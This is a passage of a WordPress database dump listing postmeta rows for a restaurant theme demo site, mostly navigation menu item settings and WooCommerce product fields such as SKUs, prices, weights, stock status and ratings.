_item_menu_item_parent','0'),(38202,3730,'_menu_item_type','custom'),(38201,3729,'_menu_item_icon','null'),(38200,3729,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38199,3729,'_menu_item_url','#'),(38198,3729,'_menu_item_xfn',''),(38197,3729,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38196,3729,'_menu_item_target',''),(38195,3729,'_menu_item_object','custom'),(38194,3729,'_menu_item_object_id','3729'),(38139,3723,'_menu_item_url','#'),(38140,3723,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38138,3723,'_menu_item_xfn',''),(38137,3723,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38136,3723,'_menu_item_target',''),(38135,3723,'_menu_item_object','custom'),(38134,3723,'_menu_item_object_id','3723'),(38132,3723,'_menu_item_type','custom'),(38133,3723,'_menu_item_menu_item_parent','0'),(38131,3722,'_menu_item_icon','null'),(38129,3722,'_menu_item_url','#'),(38130,3722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38128,3722,'_menu_item_xfn',''),(38127,3722,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38126,3722,'_menu_item_target',''),(38125,3722,'_menu_item_object','custom'),(38124,3722,'_menu_item_object_id','3722'),(38123,3722,'_menu_item_menu_item_parent','0'),(38122,3722,'_menu_item_type','custom'),(52330,4378,'_menu_item_icon','null'),(52331,4379,'_menu_item_type','custom'),(52328,4378,'_menu_item_url','#'),(52329,4378,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52326,4378,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52327,4378,'_menu_item_xfn',''),(52324,4378,'_menu_item_object','custom'),(52325,4378,'_menu_item_target',''),(52323,4378,'_menu_item_object_id','4378'),(52255,4371,'_menu_item_object_id','4371'),(52256,4371,'_menu_item_object','custom'),(52257,4371,'_menu_item_target',''),(52258,4371,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52259,4371,'_menu_item_xfn',''),(52254,4371,'_menu_item_menu_item_parent','4351'),(52253,4371,'_menu_item_type','custom'),(52252,4370,'_menu_item_icon','null'),(52246,4370,'_menu_item_object','custom'),(52247,4370,'_menu_item_target',''),(52244,4370,'_menu_item_menu_item_parent','4351'),(52245,4370,'_menu_item_object_id','4370'),(52240,4369,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(52238,4369,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52239,4369,'_menu_item_xfn',''),(52237,4369,'_menu_item_target',''),(52236,4369,'_menu_item_object','custom'),(52235,4369,'_menu_item_object_id','4369'),(52234,4369,'_menu_item_menu_item_parent','4351'),(52229,4368,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52224,4368,'_menu_item_type','custom'),(52225,4368,'_menu_item_menu_item_parent','0'),(52223,4367,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52222,4367,'_menu_item_url','#'),(52221,4367,'_menu_item_xfn',''),(52218,4367,'_menu_item_object','custom'),(52219,4367,'_menu_item_target',''),(52220,4367,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52068,4351,'_menu_item_url','#'),(52069,4351,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52108,4355,'_menu_item_url','#'),(52107,4355,'_menu_item_xfn',''),(52105,4355,'_menu_item_target',''),(52106,4355,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52104,4355,'_menu_item_object','custom'),(52103,4355,'_menu_item_object_id','4355'),(52101,4355,'_menu_item_type','custom'),(52102,4355,'_menu_item_menu_item_parent','0'),(52100,4354,'_menu_item_icon','null'),(52097,4354,'_menu_item_xfn',''),(52098,4354,'_menu_item_url','#'),(52099,4354,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52096,4354,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52095,4354,'_menu_item_target',''),(52093,4354,'_menu_item_object_id','4354'),(52094,4354,'_menu_item_object','custom'),(52089,4353,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52087,4353,'_menu_item_xfn',''),(52088,4353,'_menu_item_url','#'),(52084,4353,'_menu_item_object','custom'),(52083,4353,'_menu_item_object_id','4353'),(52082,4353,'_menu_item_menu_item_parent','0'),(52080,4352,'_menu_item_icon','null'),(52081,4353,'_menu_item_type','custom'),(51990,2949,'_wp_attached_file','2018/09/landing-img-5-1.jpg'),(27179,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27180,3115,'_sku','PR0026'),(27181,3115,'_regular_price','86'),(27182,3115,'_sale_price',''),(27183,3115,'_sale_price_dates_from',''),(27184,3115,'_sale_price_dates_to',''),(27185,3115,'total_sales','0'),(27186,3115,'_tax_status','taxable'),(27187,3115,'_tax_class',''),(27188,3115,'_manage_stock','no'),(27189,3115,'_backorders','no'),(27190,3115,'_sold_individually','no'),(27191,3115,'_weight','310'),(27192,3115,'_length',''),(27193,3115,'_width',''),(27194,3115,'_height',''),(27195,3115,'_upsell_ids','a:0:{}'),(27196,3115,'_crosssell_ids','a:0:{}'),(27197,3115,'_purchase_note',''),(27198,3115,'_default_attributes','a:0:{}'),(27199,3115,'_virtual','no'),(27200,3115,'_downloadable','no'),(27201,3115,'_product_image_gallery',''),(27202,3115,'_download_limit','-1'),(27203,3115,'_download_expiry','-1'),(27204,3115,'_stock',''),(27205,3115,'_stock_status','instock'),(27206,3115,'_wc_average_rating','3.00'),(27207,3115,'_wc_rating_count','a:1:{i:3;i:1;}'),(27208,3115,'_wc_review_count','0'),(27209,3115,'_downloadable_files','a:0:{}'),(27210,3115,'_product_attributes','a:0:{}'),(27211,3115,'_product_version','4.7.1'),(27212,3115,'_price','86'),(27213,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27214,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27215,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27216,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27217,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27218,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27219,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27220,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27221,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27222,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27223,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27224,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27225,3115,'mkdf_show_new_sign_woo_meta','no'),(27226,3115,'slide_template','default'),(27227,3115,'_wpb_vc_js_status','false'),(27228,3115,'_thumbnail_id','467'),(27229,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27230,3116,'_sku','PR0027'),(27231,3116,'_regular_price','25'),(27232,3116,'_sale_price',''),(27233,3116,'_sale_price_dates_from',''),(27234,3116,'_sale_price_dates_to',''),(27235,3116,'total_sales','0'),(27236,3116,'_tax_status','taxable'),(27237,3116,'_tax_class',''),(27238,3116,'_manage_stock','no'),(27239,3116,'_backorders','no'),(27240,3116,'_sold_individually','no'),(27241,3116,'_weight','250'),(27242,3116,'_length',''),(27243,3116,'_width',''),(27244,3116,'_height',''),(27245,3116,'_upsell_ids','a:0:{}'),(27246,3116,'_crosssell_ids','a:0:{}'),(27247,3116,'_purchase_note',''),(27248,3116,'_default_attributes','a:0:{}'),(27249,3116,'_virtual','no'),(27250,3116,'_downloadable','no'),(27251,3116,'_product_image_gallery',''),(27252,3116,'_download_limit','-1'),(27253,3116,'_download_expiry','-1'),(27254,3116,'_stock',''),(27255,3116,'_stock_status','instock'),(27256,3116,'_wc_average_rating','4.00'),(27257,3116,'_wc_rating_count','a:1:{i:4;i:1;}'),(27258,3116,'_wc_review_count','0'),(27259,3116,'_downloadable_files','a:0:{}'),(27260,3116,'_product_attributes','a:0:{}'),(27261,3116,'_product_version','4.7.1'),(27262,3116,'_price','25'),(27263,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27264,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27265,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27266,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27267,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27268,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27269,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27270,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27271,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27272,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27273,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27274,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27275,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27276,3116,'mkdf_show_new_sign_woo_meta','no'),(27277,3116,'slide_template','default'),(27278,3116,'_wpb_vc_js_status','false'),(27280,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27281,3117,'_sku','PR0028'),(27282,3117,'_regular_price','89'),(27283,3117,'_sale_price',''),(27284,3117,'_sale_price_dates_from',''),(27285,3117,'_sale_price_dates_to',''),(27286,3117,'total_sales','0'),(27287,3117,'_tax_status','taxable'),(27288,3117,'_tax_class',''),(27289,3117,'_manage_stock','no'),(27290,3117,'_backorders','no'),(27291,3117,'_sold_individually','no'),(27292,3117,'_weight','310'),(27293,3117,'_length',''),(27294,3117,'_width',''),(27295,3117,'_height',''),(27296,3117,'_upsell_ids','a:0:{}'),(27297,3117,'_crosssell_ids','a:0:{}'),(27298,3117,'_purchase_note',''),(27299,3117,'_default_attributes','a:0:{}'),(27300,3117,'_virtual','no'),(27301,3117,'_downloadable','no'),(27302,3117,'_product_image_gallery',''),(27303,3117,'_download_limit','-1'),(27304,3117,'_download_expiry','-1'),(27305,3117,'_thumbnail_id','280'),(27306,3117,'_stock',''),(27307,3117,'_stock_status','instock'),(27308,3117,'_wc_average_rating','5.00'),(27309,3117,'_wc_rating_count','a:1:{i:5;i:1;}'),(27310,3117,'_wc_review_count','0'),(27311,3117,'_downloadable_files','a:0:{}'),(27312,3117,'_product_attributes','a:0:{}'),(27313,3117,'_product_version','4.7.1'),(27314,3117,'_price','89'),(27315,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27316,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27317,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27318,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27319,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27320,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27321,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27322,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27323,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27324,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27325,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27326,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27327,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27328,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27329,3117,'mkdf_show_new_sign_woo_meta','no'),(27330,3117,'slide_template','default'),(27331,3117,'_wpb_vc_js_status','false'),(27332,3117,'_wp_old_slug','cream-broccoli-soup'),(27333,3117,'_wp_old_slug','broccoli-soup'),(27334,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27335,3118,'_sku','PR0030'),(27336,3118,'_regular_price','58'),(27337,3118,'_sale_price',''),(27338,3118,'_sale_price_dates_from',''),(27339,3118,'_sale_price_dates_to',''),(27340,3118,'total_sales','0'),(27341,3118,'_tax_status','taxable'),(27342,3118,'_tax_class',''),(27343,3118,'_manage_stock','no'),(27344,3118,'_backorders','no'),(27345,3118,'_sold_individually','no'),(27346,3118,'_weight','310'),(27347,3118,'_length',''),(27348,3118,'_width',''),(27349,3118,'_height',''),(27350,3118,'_upsell_ids','a:0:{}'),(27351,3118,'_crosssell_ids','a:0:{}'),(27352,3118,'_purchase_note',''),(27353,3118,'_default_attributes','a:0:{}'),(27354,3118,'_virtual','no'),(27355,3118,'_downloadable','no'),(27356,3118,'_product_image_gallery',''),(27357,3118,'_download_limit','-1'),(27358,3118,'_download_expiry','-1'),(27359,3118,'_thumbnail_id','273'),(27360,3118,'_stock',''),(27361,3118,'_stock_status','instock'),(27362,3118,'_wc_average_rating','5.00'),(27363,3118,'_wc_rating_count','a:1:{i:5;i:1;}'),(27364,3118,'_wc_review_count','0'),(27365,3118,'_downloadable_files','a:0:{}'),(27366,3118,'_product_attributes','a:0:{}'),(27367,3118,'_product_version','4.7.1'),(27368,3118,'_price','58'),(27369,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27370,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27371,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27372,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27373,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27374,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27375,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27376,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27377,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27378,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27379,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27380,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27381,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27382,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27383,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27384,3118,'mkdf_show_new_sign_woo_meta','no'),(27385,3118,'slide_template','default'),(27386,3118,'_wpb_vc_js_status','false'),(27387,3118,'_wp_old_slug','sea-weed-risotto'),(27388,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27389,3119,'_sku','PR0029'),(27390,3119,'_regular_price','95'),(27391,3119,'_sale_price',''),(27392,3119,'_sale_price_dates_from',''),(27393,3119,'_sale_price_dates_to',''),(27394,3119,'total_sales','0'),(27395,3119,'_tax_status','taxable'),(27396,3119,'_tax_class',''),(27397,3119,'_manage_stock','no'),(27398,3119,'_backorders','no'),(27399,3119,'_sold_individually','no'),(27400,3119,'_weight','100'),(27401,3119,'_length',''),(27402,3119,'_width',''),(27403,3119,'_height',''),(27404,3119,'_upsell_ids','a:0:{}'),(27405,3119,'_crosssell_ids','a:0:{}'),(27406,3119,'_purchase_note',''),(27407,3119,'_default_attributes','a:0:{}'),(27408,3119,'_virtual','no'),(27409,3119,'_downloadable','no'),(27410,3119,'_product_image_gallery',''),(27411,3119,'_download_limit','-1'),(27412,3119,'_download_expiry','-1'),(27413,3119,'_thumbnail_id','278'),(27414,3119,'_stock',''),(27415,3119,'_stock_status','instock'),(27416,3119,'_wc_average_rating','4.00'),(27417,3119,'_wc_rating_count','a:1:{i:4;i:1;}'),(27418,3119,'_wc_review_count','0'),(27419,3119,'_downloadable_files','a:0:{}'),(27420,3119,'_product_attributes','a:0:{}'),(27421,3119,'_product_version','4.7.1'),(27422,3119,'_price','95'),(27423,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27424,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27425,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27426,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27427,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27428,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27429,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27430,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27431,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27432,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27433,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27434,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27435,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27436,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27437,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27438,3119,'mkdf_show_new_sign_woo_meta','no'),(27439,3119,'slide_template','default'),(27440,3119,'_wpb_vc_js_status','false'),(27441,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27442,3120,'_sku','PR0031'),(27443,3120,'_regular_price','86'),(27444,3120,'_sale_price',''),(27445,3120,'_sale_price_dates_from',''),(27446,3120,'_sale_price_dates_to',''),(27447,3120,'total_sales','0'),(27448,3120,'_tax_status','taxable'),(27449,3120,'_tax_class',''),(27450,3120,'_manage_stock','no'),(27451,3120,'_backorders','no'),(27452,3120,'_sold_individually','no'),(27453,3120,'_weight','100'),(27454,3120,'_length',''),(27455,3120,'_width',''),(27456,3120,'_height',''),(27457,3120,'_upsell_ids','a:0:{}'),(27458,3120,'_crosssell_ids','a:0:{}'),(27459,3120,'_purchase_note',''),(27460,3120,'_default_attributes','a:0:{}'),(27461,3120,'_virtual','no'),(27462,3120,'_downloadable','no'),(27463,3120,'_product_image_gallery',''),(27464,3120,'_download_limit','-1'),(27465,3120,'_download_expiry','-1'),(27466,3120,'_thumbnail_id','274'),(27467,3120,'_stock',''),(27468,3120,'_stock_status','instock'),(27469,3120,'_wc_average_rating','5.00'),(27470,3120,'_wc_rating_count','a:1:{i:5;i:1;}'),(27471,3120,'_wc_review_count','0'),(27472,3120,'_downloadable_files','a:0:{}'),(27473,3120,'_product_attributes','a:0:{}'),(27474,3120,'_product_version','4.7.1'),(27475,3120,'_price','86'),(27476,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27477,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27478,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27479,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27480,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27481,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27482,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27483,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27484,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27485,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27486,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27487,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27488,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27489,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27490,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27491,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27492,3120,'mkdf_show_new_sign_woo_meta','yes'),(27493,3120,'slide_template','default'),(27494,3120,'_wpb_vc_js_status','false'),(27495,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27496,3121,'_sku','PR0032'),(27497,3121,'_regular_price','86'),(27498,3121,'_sale_price',''),(27499,3121,'_sale_price_dates_from',''),(27500,3121,'_sale_price_dates_to',''),(27501,3121,'total_sales','0'),(27502,3121,'_tax_status','taxable'),(27503,3121,'_tax_class',''),(27504,3121,'_manage_stock','no'),(27505,3121,'_backorders','no'),(27506,3121,'_sold_individually','no'),(27507,3121,'_weight','100'),(27508,3121,'_length',''),(27509,3121,'_width',''),(27510,3121,'_height',''),(27511,3121,'_upsell_ids','a:0:{}'),(27512,3121,'_crosssell_ids','a:0:{}'),(27513,3121,'_purchase_note',''),(27514,3121,'_default_attributes','a:0:{}'),(27515,3121,'_virtual','no'),(27516,3121,'_downloadable','no'),(27517,3121,'_product_image_gallery',''),(27518,3121,'_download_limit','-1'),(27519,3121,'_download_expiry','-1'),(27520,3121,'_thumbnail_id','277'),(27521,3121,'_stock',''),(27522,3121,'_stock_status','instock'),(27523,3121,'_wc_average_rating','4.00'),(27524,3121,'_wc_rating_count','a:1:{i:4;i:1;}'),(27525,3121,'_wc_review_count','0'),(27526,3121,'_downloadable_files','a:0:{}'),(27527,3121,'_product_attributes','a:0:{}'),(27528,3121,'_product_version','4.7.1'),(27529,3121,'_price','86'),(27530,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27531,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27532,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27533,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27534,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27535,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27536,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27537,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27538,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27539,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27540,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27541,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27542,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27543,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27544,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27545,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27546,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27547,3121,'mkdf_show_new_sign_woo_meta','no'),(27548,3121,'slide_template','default'),(27549,3121,'_wpb_vc_js_status','false'),(27550,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27551,3122,'_sku','PR0033'),(27552,3122,'_regular_price','86'),(27553,3122,'_sale_price',''),(27554,3122,'_sale_price_dates_from',''),(27555,3122,'_sale_price_dates_to',''),(27556,3122,'total_sales','0'),(27557,3122,'_tax_status','taxable'),(27558,3122,'_tax_class',''),(27559,3122,'_manage_stock','no'),(27560,3122,'_backorders','no'),(27561,3122,'_sold_individually','no'),(27562,3122,'_weight','100'),(27563,3122,'_length',''),(27564,3122,'_width',''),(27565,3122,'_height',''),(27566,3122,'_upsell_ids','a:0:{}'),(27567,3122,'_crosssell_ids','a:0:{}'),(27568,3122,'_purchase_note',''),(27569,3122,'_default_attributes','a:0:{}'),(27570,3122,'_virtual','no'),(27571,3122,'_downloadable','no'),(27572,3122,'_product_image_gallery',''),(27573,3122,'_download_limit','-1'),(27574,3122,'_download_expiry','-1'),(27575,3122,'_thumbnail_id','517'),(27576,3122,'_stock',''),(27577,3122,'_stock_status','instock'),(27578,3122,'_wc_average_rating','4.00'),(27579,3122,'_wc_rating_count','a:1:{i:4;i:1;}'),(27580,3122,'_wc_review_count','0'),(27581,3122,'_downloadable_files','a:0:{}'),(27582,3122,'_product_attributes','a:0:{}'),(27583,3122,'_product_version','4.7.1'),(27584,3122,'_price','86'),(27585,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27586,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27587,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27588,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27589,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27590,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27591,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27592,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27593,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27594,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27595,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27596,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27597,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27598,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27599,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27600,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27601,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27602,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27603,3122,'mkdf_show_new_sign_woo_meta','no'),(27604,3122,'slide_template',''),(27605,3122,'_wpb_vc_js_status','false'),(27606,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27607,528,'_sku','PR0034'),(27608,528,'_regular_price','150'),(27609,528,'_sale_price','115'),(27610,528,'_sale_price_dates_from',''),(27611,528,'_sale_price_dates_to',''),(27612,528,'total_sales','0'),(27613,528,'_tax_status','taxable'),(27614,528,'_tax_class',''),(27615,528,'_manage_stock','no'),(27616,528,'_backorders','no'),(27617,528,'_sold_individually','no'),(27618,528,'_weight','350'),(27619,528,'_length',''),(27620,528,'_width',''),(27621,528,'_height',''),(27622,528,'_upsell_ids','a:0:{}'),(27623,528,'_crosssell_ids','a:0:{}'),(27624,528,'_purchase_note',''),(27625,528,'_default_attributes','a:0:{}'),(27626,528,'_virtual','no'),(27627,528,'_downloadable','no'),(27628,528,'_product_image_gallery',''),(27629,528,'_download_limit','-1'),(27630,528,'_download_expiry','-1'),(27631,528,'_thumbnail_id','520'),(27632,528,'_stock',''),(27633,528,'_stock_status','instock'),(27634,528,'_wc_average_rating','3.00'),(27635,528,'_wc_rating_count','a:1:{i:3;i:1;}'),(27636,528,'_wc_review_count','0'),(27637,528,'_downloadable_files','a:0:{}'),(27638,528,'_product_attributes','a:0:{}'),(27639,528,'_product_version','4.7.1'),(27640,528,'_price','115'),(27641,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27642,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27643,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27644,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27645,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27646,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27647,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27648,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27649,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27650,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27651,528,'_vc_post_settings','a:1:{